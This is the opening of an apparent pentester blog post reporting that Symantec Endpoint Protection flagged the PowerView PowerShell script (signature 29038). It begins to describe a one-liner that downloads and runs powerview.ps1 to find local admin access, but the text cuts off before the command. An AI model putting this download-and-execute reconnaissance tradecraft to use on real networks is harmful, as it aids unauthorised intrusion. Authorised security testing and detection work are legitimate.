It has finally happened, Matt Graeber‘s Powerview Powershell cmdlet was caught by Symantec Endpoint Protection (SEP) during a pentest this week. The cmdlet is SID 29038  in Symantec’s attack signature database. Scenario During testing I used the following one-liner to download import the powerview.ps1 script and then execute Invoke-FindLocalAdminAcess from a general user’s desktop: powershell…